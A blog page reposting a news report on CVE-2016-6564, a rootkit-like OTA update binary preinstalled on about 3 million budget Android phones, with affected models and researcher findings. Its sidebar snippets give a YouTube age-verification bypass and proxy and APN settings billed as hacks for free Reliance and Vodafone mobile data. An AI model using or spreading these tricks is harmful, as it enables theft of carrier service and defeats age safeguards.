Skip to main content

Backdoor/Rootkit Comes Pre-installed

Here's some bad news for Android users again.

Nearly 3 Million Android devices worldwide are vulnerable to man-in-the-middle (MITM) attacks that could allow attackers to remotely execute arbitrary code with root privileges, turning over full control of the devices to hackers.

According to a new report from security rating firm BitSight, the issue is due to a vulnerability in the insecure implementation of the OTA (Over-the-Air) update mechanism used by certain low-cost Android devices, including BLU Studio G from US-based Best Buy.

Backdoor/Rootkit Comes Pre-installed


The vulnerable OTA mechanism, which is associated with Chinese mobile firm Ragentek Group, contains a hidden binary — resides as /system/bin/debugs — that runs with root privileges and communicates over unencrypted channels with three hosts.

According to the researchers, this privileged binary not only exposes user-specific information to MITM attackers but also acts as a rootkit, potentially allowing attackers to remotely execute arbitrary commands on affected devices as a privileged user.

"Additionally, there are multiple techniques used to hide the execution of this binary. This behavior could be described as a rootkit," the CERT advisory associated with this vulnerability warned on Thursday.
Similar to the flaw discovered in Android devices running firmware from Shanghai ADUPS Technology, the newly discovered flaw (designated CVE-2016-6564) also resides in the firmware developed by a Chinese company.

While the AdUps firmware was caught stealing user and device information, the Ragentek firmware neither encrypt the communications sent and received to smartphones nor rely on code-signing to validate legitimate apps.

This blunder could allow a remote attacker to extract personal information from an affected device, remotely wiping the whole device, and even make it possible to gain access to other systems on a corporate network and steal sensitive data.

Affected Android Devices


The vulnerability has been found in multiple smartphone handsets from BLU Products, along with over a dozen devices from other vendors. The list of affected Android handsets includes:

  • BLU Studio G
  • BLU Studio G Plus
  • BLU Studio 6.0 HD
  • BLU Studio X
  • BLU Studio X Plus
  • BLU Studio C HD
  • Infinix Hot X507
  • Infinix Hot 2 X510
  • Infinix Zero X506
  • Infinix Zero 2 X509
  • DOOGEE Voyager 2 DG310
  • LEAGOO Lead 5
  • LEAGOO Lead 6
  • LEAGOO Lead 3i
  • LEAGOO Lead 2S
  • LEAGOO Alfa 6
  • IKU Colorful K45i
  • Beeline Pro 2
  • XOLO Cube 5.0

While analyzing the flaw, AnubisNetworks found that the device, a BLU Studio G, attempted to contact three pre-configured Internet domains, two of which remained unregistered despite being hardwired into the Ragentek firmware that introduced the bug.

"This OTA binary was distributed with a set of domains preconfigured in the software. Only one of these domains was registered at the time of the discovery of this issue," BitSight's subsidiary company Anubis Networks says in its report published Thursday. 
"If an adversary had noticed this, and registered these two domains, they would’ve instantly had access to perform arbitrary attacks on almost 3,000,000 devices without the need to perform a man-in-the-middle attack."

After the discovery, AnubisNetworks researchers registered the addresses and now controls those two extraneous domains to this day in an attempt to prevent such attacks from occurring in the future.

Around 3 Million Devices contain Dangerous Rootkit


Still, the impact was significant. The researchers were able to exploit the backdoor in the BLU Studio G phone, which allowed them to install a file in the location that's reserved for apps with all-powerful system privileges.


However, by observing the data smartphones sent when connecting to the two domains registered by BitSight, the researchers have cataloged 55 known device models that are affected.
"We have observed over 2.8 Million distinct devices, across roughly 55 reported device models, which have checked into our sinkholes since we registered the extraneous domains," the report reads. 
"In some cases, we have not been [able] to translate the provided device model into a reference to the real-world device."
So far, only BLU Products has issued a software update to address the vulnerability, though BitSight researchers haven't yet tested the patch to analyze its effectiveness. However, the remaining Android devices might still be affected.

For more technical details about the vulnerability, you can head on to full report published by BitSight's AnubisNetworks.

This is the second case in a single week when researchers have warned you of Android smartphones coming pre-installed with backdoors that not only send massive amounts of your personal data to Chinese servers, but also allow hackers to take control of your device.

Comments

  1. jemas join26 May 2020 at 05:46

    I want to set up a roadrunner email account for effective and clear communication. I don’t have a strong and full technical background for the proper and full roadrunner email setup process.

    ReplyDelete
  2. Singh YT Entertainment News15 May 2022 at 00:40

    good

    ReplyDelete

Post a Comment

Popular posts from this blog

Watch 18+ Videos On Youtube Without Signing In

                                          Sometime its  annoying  when youtube ask you to  sign  in for your  age verification  to watch  18+  videos . So i  will make  it easy for you by showing you  a simple   youtube trick to  watch  adult or 18+  youtube videos  without signing In. This trick is 100% working as of 2013. So  lets get  started. How To Watch 18+ Youtube Videos Without Logging In ? 1. First get the  Url  of video you want to  watch . As shown below. http://www.youtube.com/watch?v= 4Xkh6j7RMqk   2. Then  cop y the Video Id. For above link video Id is   4Xkh6j7RMqk 3. Now paste the Video Id  in the link  given below. http://www.youtube.com/v/ VideoId ?fs=1 Replace  VideoId  with the Id you copied in  Step 2 ...
Post a Comment
Read more

Reliance 3g Trick Hacked By Mobile Hacking Tricks

                                                    Just make setting as per your state and enjoy Report us when the settings will stop working. free reliance 3G in mobile... Reliance 3G Trick For Mumbai:- Apn:- rcomnet Port:- 8080 Proxy:- 95.140.47.243 Homepage:- http:// google.com Reliance 3G Trick For Bihar:- Apn:- rcomnet Port:- 8080 Proxy:- 92.48.126.211 Homepage:- http://google.com Reliance 3G Trick For U.P. :- Apn:- rcomnet Port:- 3128 Proxy:- 213.197.81.50 Homepage:- http://google.com Reliance 3G Trick For Gujarat :- Apn:- rcomnet Port:- 8080 Proxy:- 80.87.245.65 Homepage:- http://google.com Reliance 3G Trick For Delhi:- Apn:- rcomnet Port:- 8080 Proxy:- 91.201.21.170 Homepage:- http://google.com Reliance 3G Trick For Kerala:- Apn:- rcomnet Port:- 3128 Proxy:- 78.47.47.135 Homepage:- http://google.com Reliance 3G Trick For Haryana:- Apn:- rcomn...
Post a Comment
Read more

Vodafone Hack For Free GPRS

This method has been tested on different mobiles and has been confirmed to be working. Followng are the Settings you require to configure on your Mobile: Account Name: Vodafone_gprs Homepage: http://live.vodafone.in User Name: (no need) Pass: (no need) Access Point Settings :- Proxy: Enabled Proxy Address: 10.10.1.100 Proxy Port: 9401 Data Bearer: Packet Data Bearer Settings :- Packet Data Access Point: portalnmms Network type: IPV4 Authentication: normal User Name: (no need) Password: (no need) *IF that happen this settings is not working then change the proxy port number to:- Proxy Port: 9401
Post a Comment
Read more